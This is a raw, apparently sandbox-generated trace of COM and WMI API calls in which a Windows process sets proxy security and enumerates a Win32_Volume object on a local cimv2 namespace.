	[0244.554] IUnknown:QueryInterface (in: This=0x608cb34, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae3ac | out: ppvObject=0x5fae3ac*=0x608cb38) returned 0x0
	[0244.554] IClientSecurity:SetBlanket (This=0x608cb38, pProxy=0x608cb34, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0244.565] IUnknown:Release (This=0x608cb38) returned 0x2
	[0244.565] WbemLocator:IUnknown:Release (This=0x586c4c) returned 0x1
	[0244.565] CoTaskMemFree (pv=0x5862f8) 
	[0244.565] WbemLocator:IUnknown:Release (This=0x608d3c4) returned 0x2
	[0244.565] IUnknown:QueryInterface (in: This=0x608cb34, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadd68 | out: ppvObject=0x5fadd68*=0x586c4c) returned 0x0
	[0244.566] WbemLocator:IUnknown:QueryInterface (in: This=0x586c4c, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fadd24 | out: ppvObject=0x5fadd24*=0x0) returned 0x80004002
	[0244.571] WbemLocator:IUnknown:QueryInterface (in: This=0x586c4c, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fadc18 | out: ppvObject=0x5fadc18*=0x0) returned 0x80004002
	[0244.572] WbemLocator:IUnknown:AddRef (This=0x586c4c) returned 0x3
	[0244.572] CoGetContextToken (in: pToken=0x5fadbb0 | out: pToken=0x5fadbb0) returned 0x0
	[0244.572] WbemLocator:IUnknown:QueryInterface (in: This=0x586c4c, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadb98 | out: ppvObject=0x5fadb98*=0x586bac) returned 0x0
	[0244.573] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x586bac, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5fadba0 | out: pCid=0x5fadba0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0244.573] WbemLocator:IUnknown:Release (This=0x586bac) returned 0x3
	[0244.573] CoGetContextToken (in: pToken=0x5fadba8 | out: pToken=0x5fadba8) returned 0x0
	[0244.573] WbemLocator:IUnknown:AddRef (This=0x586c4c) returned 0x4
	[0244.573] WbemLocator:IUnknown:QueryInterface (in: This=0x586c4c, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadc1c | out: ppvObject=0x5fadc1c*=0x586c34) returned 0x0
	[0244.573] WbemLocator:IUnknown:Release (This=0x586c4c) returned 0x4
	[0244.573] WbemLocator:IRpcOptions:Query (in: This=0x586c34, pPrx=0x586c4c, dwProperty=2, pdwValue=0x5fadc40 | out: pdwValue=0x5fadc40) returned 0x80004002
	[0244.573] WbemLocator:IUnknown:Release (This=0x586c34) returned 0x3
	[0244.573] WbemLocator:IUnknown:Release (This=0x586c4c) returned 0x2
	[0244.573] CoGetContextToken (in: pToken=0x5fae01c | out: pToken=0x5fae01c) returned 0x0
	[0244.574] CoGetContextToken (in: pToken=0x5fadfdc | out: pToken=0x5fadfdc) returned 0x0
	[0244.574] WbemLocator:IUnknown:AddRef (This=0x586c4c) returned 0x3
	[0244.574] WbemLocator:IUnknown:QueryInterface (in: This=0x586c4c, riid=0x5fae058*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5fae054 | out: ppvObject=0x5fae054*=0x608cb34) returned 0x0
	[0244.574] WbemLocator:IUnknown:Release (This=0x586c4c) returned 0x3
	[0244.574] IUnknown:Release (This=0x608cb34) returned 0x2
	[0244.574] IUnknown:Release (This=0x608cb34) returned 0x1
	[0244.574] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6080820, puCount=0x5fae9a8 | out: puCount=0x5fae9a8*=0x2) returned 0x0
	[0244.574] WbemDefPath:IWbemPath:GetText (in: This=0x6080820, lFlags=4, puBuffLength=0x5fae9a4*=0x0, pszText=0x0 | out: puBuffLength=0x5fae9a4*=0x17, pszText=0x0) returned 0x0
	[0244.574] WbemDefPath:IWbemPath:GetText (in: This=0x6080820, lFlags=4, puBuffLength=0x5fae9a4*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5fae9a4*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0244.574] CoGetContextToken (in: pToken=0x5fae344 | out: pToken=0x5fae344) returned 0x0
	[0244.574] CoGetContextToken (in: pToken=0x5fae304 | out: pToken=0x5fae304) returned 0x0
	[0244.574] WbemLocator:IUnknown:AddRef (This=0x586c4c) returned 0x2
	[0244.575] WbemLocator:IUnknown:QueryInterface (in: This=0x586c4c, riid=0x5fae380*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5fae37c | out: ppvObject=0x5fae37c*=0x608cb34) returned 0x0
	[0244.575] WbemLocator:IUnknown:Release (This=0x586c4c) returned 0x2
	[0244.575] IUnknown:AddRef (This=0x608cb34) returned 0x3
	[0244.575] IEnumWbemClassObject:Clone (in: This=0x608cb34, ppEnum=0x5fae978 | out: ppEnum=0x5fae978*=0x608d464) returned 0x0
	[0244.583] IUnknown:QueryInterface (in: This=0x608d464, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae634 | out: ppvObject=0x5fae634*=0x608d468) returned 0x0
	[0244.583] IClientSecurity:QueryBlanket (in: This=0x608d468, pProxy=0x608d464, pAuthnSvc=0x5fae67c, pAuthzSvc=0x5fae678, pServerPrincName=0x5fae688, pAuthnLevel=0x5fae680, pImpLevel=0x5fae66c, pAuthInfo=0x5fae670, pCapabilites=0x5fae674 | out: pAuthnSvc=0x5fae67c*=0xa, pAuthzSvc=0x5fae678*=0x0, pServerPrincName=0x5fae688, pAuthnLevel=0x5fae680*=0x6, pImpLevel=0x5fae66c*=0x2, pAuthInfo=0x5fae670, pCapabilites=0x5fae674*=0x1) returned 0x0
	[0244.584] IUnknown:Release (This=0x608d468) returned 0x1
	[0244.584] IUnknown:QueryInterface (in: This=0x608d464, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae628 | out: ppvObject=0x5fae628*=0x586e2c) returned 0x0
	[0244.584] IUnknown:QueryInterface (in: This=0x608d464, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae624 | out: ppvObject=0x5fae624*=0x608d468) returned 0x0
	[0244.584] IClientSecurity:SetBlanket (This=0x608d468, pProxy=0x608d464, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0244.591] IUnknown:Release (This=0x608d468) returned 0x2
	[0244.591] WbemLocator:IUnknown:Release (This=0x586e2c) returned 0x1
	[0244.591] CoTaskMemFree (pv=0x586298) 
	[0244.591] IUnknown:Release (This=0x608cb34) returned 0x2
	[0244.591] IUnknown:QueryInterface (in: This=0x608d464, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadfd0 | out: ppvObject=0x5fadfd0*=0x586e2c) returned 0x0
	[0244.591] WbemLocator:IUnknown:QueryInterface (in: This=0x586e2c, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fadf8c | out: ppvObject=0x5fadf8c*=0x0) returned 0x80004002
	[0244.603] WbemLocator:IUnknown:QueryInterface (in: This=0x586e2c, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fade80 | out: ppvObject=0x5fade80*=0x0) returned 0x80004002
	[0244.615] WbemLocator:IUnknown:AddRef (This=0x586e2c) returned 0x3
	[0244.615] CoGetContextToken (in: pToken=0x5fade18 | out: pToken=0x5fade18) returned 0x0
	[0244.615] WbemLocator:IUnknown:QueryInterface (in: This=0x586e2c, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fade00 | out: ppvObject=0x5fade00*=0x586d8c) returned 0x0
	[0244.615] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x586d8c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5fade08 | out: pCid=0x5fade08*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0244.615] WbemLocator:IUnknown:Release (This=0x586d8c) returned 0x3
	[0244.615] CoGetContextToken (in: pToken=0x5fade10 | out: pToken=0x5fade10) returned 0x0
	[0244.615] WbemLocator:IUnknown:AddRef (This=0x586e2c) returned 0x4
	[0244.615] WbemLocator:IUnknown:QueryInterface (in: This=0x586e2c, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fade84 | out: ppvObject=0x5fade84*=0x586e14) returned 0x0
	[0244.616] WbemLocator:IUnknown:Release (This=0x586e2c) returned 0x4
	[0244.616] WbemLocator:IRpcOptions:Query (in: This=0x586e14, pPrx=0x586e2c, dwProperty=2, pdwValue=0x5fadea8 | out: pdwValue=0x5fadea8) returned 0x80004002
	[0244.616] WbemLocator:IUnknown:Release (This=0x586e14) returned 0x3
	[0244.616] WbemLocator:IUnknown:Release (This=0x586e2c) returned 0x2
	[0244.616] CoGetContextToken (in: pToken=0x5fae284 | out: pToken=0x5fae284) returned 0x0
	[0244.616] CoGetContextToken (in: pToken=0x5fae244 | out: pToken=0x5fae244) returned 0x0
	[0244.616] WbemLocator:IUnknown:AddRef (This=0x586e2c) returned 0x3
	[0244.616] WbemLocator:IUnknown:QueryInterface (in: This=0x586e2c, riid=0x5fae2c0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5fae2bc | out: ppvObject=0x5fae2bc*=0x608d464) returned 0x0
	[0244.616] WbemLocator:IUnknown:Release (This=0x586e2c) returned 0x3
	[0244.616] IUnknown:Release (This=0x608d464) returned 0x2
	[0244.616] IUnknown:Release (This=0x608d464) returned 0x1
	[0244.623] CoGetContextToken (in: pToken=0x5fae878 | out: pToken=0x5fae878) returned 0x0
	[0244.623] CoGetContextToken (in: pToken=0x5fae838 | out: pToken=0x5fae838) returned 0x0
	[0244.623] WbemLocator:IUnknown:AddRef (This=0x586e2c) returned 0x2
	[0244.623] WbemLocator:IUnknown:QueryInterface (in: This=0x586e2c, riid=0x5fae8b4*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5fae8b0 | out: ppvObject=0x5fae8b0*=0x608d464) returned 0x0
	[0244.623] WbemLocator:IUnknown:Release (This=0x586e2c) returned 0x2
	[0244.624] IUnknown:AddRef (This=0x608d464) returned 0x3
	[0244.624] IEnumWbemClassObject:Reset (This=0x608d464) returned 0x0
	[0244.634] IUnknown:Release (This=0x608d464) returned 0x2
	[0244.640] CoGetContextToken (in: pToken=0x5fae76c | out: pToken=0x5fae76c) returned 0x0
	[0244.640] IUnknown:AddRef (This=0x608d464) returned 0x3
	[0244.641] IEnumWbemClassObject:Next (in: This=0x608d464, lTimeout=-1, uCount=0x1, apObjects=0x4f1530, puReturned=0x2e7f8d4 | out: apObjects=0x4f1530*=0x608d4a0, puReturned=0x2e7f8d4*=0x1) returned 0x0
	[0245.671] IUnknown:QueryInterface (in: This=0x608d4a0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadd78 | out: ppvObject=0x5fadd78*=0x608d4a0) returned 0x0
	[0245.672] IUnknown:QueryInterface (in: This=0x608d4a0, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fadd34 | out: ppvObject=0x5fadd34*=0x0) returned 0x80004002
	[0245.672] IUnknown:QueryInterface (in: This=0x608d4a0, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fadc28 | out: ppvObject=0x5fadc28*=0x0) returned 0x80004002
	[0245.672] IUnknown:AddRef (This=0x608d4a0) returned 0x3
	[0245.672] CoGetContextToken (in: pToken=0x5fadbc0 | out: pToken=0x5fadbc0) returned 0x0
	[0245.672] IUnknown:QueryInterface (in: This=0x608d4a0, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadba8 | out: ppvObject=0x5fadba8*=0x608d4a4) returned 0x0
	[0245.673] IMarshal:GetUnmarshalClass (in: This=0x608d4a4, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5fadbb0 | out: pCid=0x5fadbb0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
	[0245.673] IUnknown:Release (This=0x608d4a4) returned 0x3
	[0245.673] CoGetContextToken (in: pToken=0x5fadbb8 | out: pToken=0x5fadbb8) returned 0x0
	[0245.673] IUnknown:AddRef (This=0x608d4a0) returned 0x4
	[0245.673] IUnknown:QueryInterface (in: This=0x608d4a0, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadc2c | out: ppvObject=0x5fadc2c*=0x0) returned 0x80004002
	[0245.673] IUnknown:Release (This=0x608d4a0) returned 0x3
	[0245.674] IUnknown:Release (This=0x608d4a0) returned 0x2
	[0245.674] CoGetContextToken (in: pToken=0x5fae018 | out: pToken=0x5fae018) returned 0x0
	[0245.674] CoGetContextToken (in: pToken=0x5fadfd8 | out: pToken=0x5fadfd8) returned 0x0
	[0245.674] IUnknown:AddRef (This=0x608d4a0) returned 0x3
	[0245.674] IUnknown:QueryInterface (in: This=0x608d4a0, riid=0x5fae054*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x5fae050 | out: ppvObject=0x5fae050*=0x608d4a0) returned 0x0
	[0245.674] IUnknown:Release (This=0x608d4a0) returned 0x3
	[0245.675] IUnknown:Release (This=0x608d4a0) returned 0x2
	[0245.675] IUnknown:Release (This=0x608d4a0) returned 0x1
	[0245.675] IUnknown:Release (This=0x608d464) returned 0x2
	[0245.675] CoGetContextToken (in: pToken=0x5fae8fc | out: pToken=0x5fae8fc) returned 0x0
	[0245.675] IUnknown:AddRef (This=0x608d4a0) returned 0x2
	[0245.680] IWbemClassObject:Get (in: This=0x608d4a0, wszName="__GENUS", lFlags=0, pVal=0x5fae978*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x5faea2c*=0, plFlavor=0x5faea28*=0 | out: pVal=0x5fae978*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x5faea2c*=3, plFlavor=0x5faea28*=64) returned 0x0
	[0245.680] IWbemClassObject:Get (in: This=0x608d4a0, wszName="__PATH", lFlags=0, pVal=0x5fae958*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x5faea10*=0, plFlavor=0x5faea0c*=0 | out: pVal=0x5fae958*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x5faea10*=8, plFlavor=0x5faea0c*=64) returned 0x0
	[0245.681] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x64
	[0245.681] CoGetObjectContext (in: riid=0x2e7ab54*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5fae9b0 | out: ppv=0x5fae9b0*=0x4a8dec) returned 0x0
	[0245.681] IComThreadingInfo:GetCurrentApartmentType (in: This=0x4a8dec, pAptType=0x5fae9a8 | out: pAptType=0x5fae9a8*=1) returned 0x0
	[0245.681] IUnknown:QueryInterface (in: This=0x4a8dec, riid=0x2e7ab3c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5fae9ac | out: ppvObject=0x5fae9ac*=0x0) returned 0x80004002
	[0245.681] IUnknown:Release (This=0x4a8dec) returned 0x1
	[0245.682] CoGetClassObject (in: rclsid=0x563d04*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5fae4c8 | out: ppv=0x5fae4c8*=0x608cb70) returned 0x0
	[0245.682] WbemDefPath:IUnknown:QueryInterface (in: This=0x608cb70, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fae2f8 | out: ppvObject=0x5fae2f8*=0x0) returned 0x80004002
	[0245.682] WbemDefPath:IClassFactory:CreateInstance (in: This=0x608cb70, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae330 | out: ppvObject=0x5fae330*=0x608d638) returned 0x0
	[0245.682] WbemDefPath:IUnknown:QueryInterface (in: This=0x608d638, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae0d4 | out: ppvObject=0x5fae0d4*=0x608d638) returned 0x0
	[0245.682] WbemDefPath:IUnknown:QueryInterface (in: This=0x608d638, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fae090 | out: ppvObject=0x5fae090*=0x0) returned 0x80004002
	[0245.683] WbemDefPath:IUnknown:AddRef (This=0x608d638) returned 0x3
	[0245.683] CoGetContextToken (in: pToken=0x5fadf1c | out: pToken=0x5fadf1c) returned 0x0
	[0245.683] WbemDefPath:IUnknown:QueryInterface (in: This=0x608d638, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadf04 | out: ppvObject=0x5fadf04*=0x57d468) returned 0x0
	[0245.683] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x57d468, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5fadf0c | out: pCid=0x5fadf0c*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0245.683] WbemDefPath:IUnknown:Release (This=0x57d468) returned 0x3
	[0245.684] CoGetContextToken (in: pToken=0x5fadf14 | out: pToken=0x5fadf14) returned 0x0
	[0245.684] WbemDefPath:IUnknown:AddRef (This=0x608d638) returned 0x4
	[0245.684] WbemDefPath:IUnknown:QueryInterface (in: This=0x608d638, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadf88 | out: ppvObject=0x5fadf88*=0x0) returned 0x80004002
	[0245.684] WbemDefPath:IUnknown:Release (This=0x608d638) returned 0x3
	[0245.684] WbemDefPath:IUnknown:Release (This=0x608d638) returned 0x2
	[0245.684] WbemDefPath:IUnknown:Release (This=0x608cb70) returned 0x0
	[0245.684] WbemDefPath:IUnknown:Release (This=0x608d638) returned 0x1
	[0245.684] CoGetContextToken (in: pToken=0x5fae7c4 | out: pToken=0x5fae7c4) returned 0x0
	[0245.684] CoGetContextToken (in: pToken=0x5fae784 | out: pToken=0x5fae784) returned 0x0
	[0245.685] WbemDefPath:IUnknown:AddRef (This=0x608d638) returned 0x2
	[0245.685] WbemDefPath:IUnknown:QueryInterface (in: This=0x608d638, riid=0x5fae800*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5fae7fc | out: ppvObject=0x5fae7fc*=0x608d638) returned 0x0
	[0245.685] WbemDefPath:IUnknown:Release (This=0x608d638) returned 0x2
	[0245.685] WbemDefPath:IUnknown:Release (This=0x608d638) returned 0x1
	[0245.685] CoGetContextToken (in: pToken=0x5fae844 | out: pToken=0x5fae844) returned 0x0
	[0245.685] CoGetContextToken (in: pToken=0x5fae804 | out: pToken=0x5fae804) returned 0x0
	[0245.685] WbemDefPath:IUnknown:AddRef (This=0x608d638) returned 0x2
	[0245.685] WbemDefPath:IUnknown:QueryInterface (in: This=0x608d638, riid=0x5fae880*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5fae87c | out: ppvObject=0x5fae87c*=0x608d638) returned 0x0
	[0245.686] WbemDefPath:IUnknown:Release (This=0x608d638) returned 0x2
	[0245.686] WbemDefPath:IUnknown:AddRef (This=0x608d638) returned 0x3
	[0245.686] WbemDefPath:IWbemPath:SetText (This=0x608d638, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x0
	[0245.686] WbemDefPath:IUnknown:Release (This=0x608d638) returned 0x2
	[0245.686] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6080820, puCount=0x5fae9e4 | out: puCount=0x5fae9e4*=0x2) returned 0x0
	[0245.686] WbemDefPath:IWbemPath:GetText (in: This=0x6080820, lFlags=4, puBuffLength=0x5fae9e0*=0x0, pszText=0x0 | out: puBuffLength=0x5fae9e0*=0x17, pszText=0x0) returned 0x0
	[0245.686] WbemDefPath:IWbemPath:GetText (in: This=0x6080820, lFlags=4, puBuffLength=0x5fae9e0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5fae9e0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0245.686] CoGetContextToken (in: pToken=0x5fae76c | out: pToken=0x5fae76c) returned 0x0
	[0245.686] IUnknown:AddRef (This=0x608d464) returned 0x3
	[0245.686] IEnumWbemClassObject:Next (in: This=0x608d464, lTimeout=-1, uCount=0x1, apObjects=0x4f1530, puReturned=0x2e7f8d4 | out: apObjects=0x4f1530*=0x0, puReturned=0x2e7f8d4*=0x0) returned 0x1
	[0245.805] IUnknown:Release (This=0x608d464) returned 0x2
	[0245.806] CoGetContextToken (in: pToken=0x5fae8b4 | out: pToken=0x5fae8b4) returned 0x0
	[0245.806] WbemLocator:IUnknown:Release (This=0x586e2c) returned 0x1
	[0245.807] IUnknown:Release (This=0x608d464) returned 0x0
	[0245.836] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6080820, puCount=0x5faea58 | out: puCount=0x5faea58*=0x2) returned 0x0
	[0245.836] WbemDefPath:IWbemPath:GetText (in: This=0x6080820, lFlags=4, puBuffLength=0x5faea54*=0x0, pszText=0x0 | out: puBuffLength=0x5faea54*=0x17, pszText=0x0) returned 0x0
	[0245.836] WbemDefPath:IWbemPath:GetText (in: This=0x6080820, lFlags=4, puBuffLength=0x5faea54*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5faea54*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
